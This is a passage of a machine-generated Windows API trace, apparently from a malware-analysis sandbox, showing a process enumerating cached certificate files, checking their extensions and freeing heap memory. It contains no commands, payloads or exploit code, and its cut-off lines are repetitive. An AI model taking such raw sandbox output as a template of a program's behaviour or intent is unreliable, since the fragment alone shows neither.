ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xed9b0820, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xed9b0820, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x32d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="696F3DE637E6DE85B458996D49D759AD", cAlternateFileName="696F3D~1")) returned 1 [0241.406] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD") returned="" [0241.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0241.406] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf763370, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf763370, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf763370, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x648, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", cAlternateFileName="705A76~1")) returned 1 [0241.406] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21") returned="" [0241.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.406] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedb2d5e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedb2d5e0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedb2d5e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x22a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7396C420A8E1BC1DA97F1AF0D10BAD21", cAlternateFileName="7396C4~1")) returned 1 [0241.406] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned="" [0241.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0241.406] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x540c1170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x540c1170, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x312640, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", cAlternateFileName="7423F8~1")) returned 1 [0241.406] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6") returned="" [0241.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.406] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd0e4c510, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x1fa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7B2238AACCEDC3F1FFE8E7EB5F575EC9", cAlternateFileName="7B2238~1")) returned 1 [0241.406] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned="" [0241.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0241.407] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6b2324c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6b2324c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x6b2324c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x67c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", cAlternateFileName="7B8944~1")) returned 1 [0241.407] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D") returned="" [0241.407] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.407] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6b199f40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6b199f40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x6b199f40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", cAlternateFileName="7D266D~2")) returned 1 [0241.408] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6") returned="" [0241.408] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.408] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xefaf7160, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xefaf7160, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xaec313e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", cAlternateFileName="7D266D~1")) returned 1 [0241.408] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD") returned="" [0241.408] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.408] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6056b480, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6056b480, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x1ef687a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", cAlternateFileName="8059E9~3")) returned 1 [0241.408] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0") returned="" [0241.408] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.408] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x61210960, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61210960, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaecc9960, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", cAlternateFileName="80273C~1")) returned 1 [0241.408] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E") returned="" [0241.408] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.408] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x58e24200, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x58e24200, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae9f5f40, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", cAlternateFileName="8059E9~2")) returned 1 [0241.408] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1") returned="" [0241.408] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.408] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x61236ac0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61236ac0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x3b0b01a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", cAlternateFileName="809279~1")) returned 1 [0241.409] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E") returned="" [0241.409] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.409] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x58394060, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x58394060, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f739c0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", cAlternateFileName="8059E9~1")) returned 1 [0241.409] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4") returned="" [0241.409] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.409] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x62378a40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x62378a40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae9a9c80, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", cAlternateFileName="80E4BE~1")) returned 1 [0241.409] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778") returned="" [0241.409] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.409] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x613675c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x613675c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69bba4a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", cAlternateFileName="803B9E~1")) returned 1 [0241.409] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED") returned="" [0241.409] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.409] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x63c50fe0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x63c50fe0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb100bf40, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", cAlternateFileName="803D37~1")) returned 1 [0241.409] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E") returned="" [0241.409] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.409] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x61021780, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61021780, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb1058200, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", cAlternateFileName="8059E9~4")) returned 1 [0241.409] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30") returned="" [0241.409] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.409] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x636a9ba0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x636a9ba0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb139e040, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", cAlternateFileName="800D31~1")) returned 1 [0241.409] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB") returned="" [0241.409] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.409] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x581f7ea0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x581f7ea0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f4d860, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x56e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", cAlternateFileName="828298~1")) returned 1 [0241.409] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56") returned="" [0241.409] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.409] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xec3c5340, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xec3c5340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xb16257a0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", cAlternateFileName="8828F3~1")) returned 1 [0241.409] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F") returned="" [0241.409] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.409] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x8064ac00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x8064ac00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80670d60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", cAlternateFileName="8828F3~2")) returned 1 [0241.409] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416") returned="" [0241.410] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.410] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6aa2c0a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6aa2c0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xadf19ae0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x59d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", cAlternateFileName="8E4E51~1")) returned 1 [0241.410] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned="" [0241.410] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.410] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbddd270, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0xd2da, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="94308059B57B3142E455B38A6EB92015", cAlternateFileName="943080~1")) returned 1 [0241.410] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015") returned="" [0241.410] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0241.410] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6a83cec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a83cec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaebe5120, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x5e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", cAlternateFileName="955CAB~1")) returned 1 [0241.410] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned="" [0241.410] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.410] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf3f73d0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf3f73d0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf3f73d0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x5ab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", cAlternateFileName="9BC2FF~1")) returned 1 [0241.410] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned="" [0241.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.411] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe06277d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe06277d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xb15d94e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x652, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", cAlternateFileName="9C888B~1")) returned 1 [0241.411] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned="" [0241.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.411] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe07ca6f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe07ca6f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0x965accc0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x652, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061", cAlternateFileName="9C888B~2")) returned 1 [0241.411] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9C888BEABCCBC2A97B0D6D9214C3BA37_EBC75728C6119A77E4DA8559DD10F061") returned="" [0241.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0241.411] FindNextFileW (in: 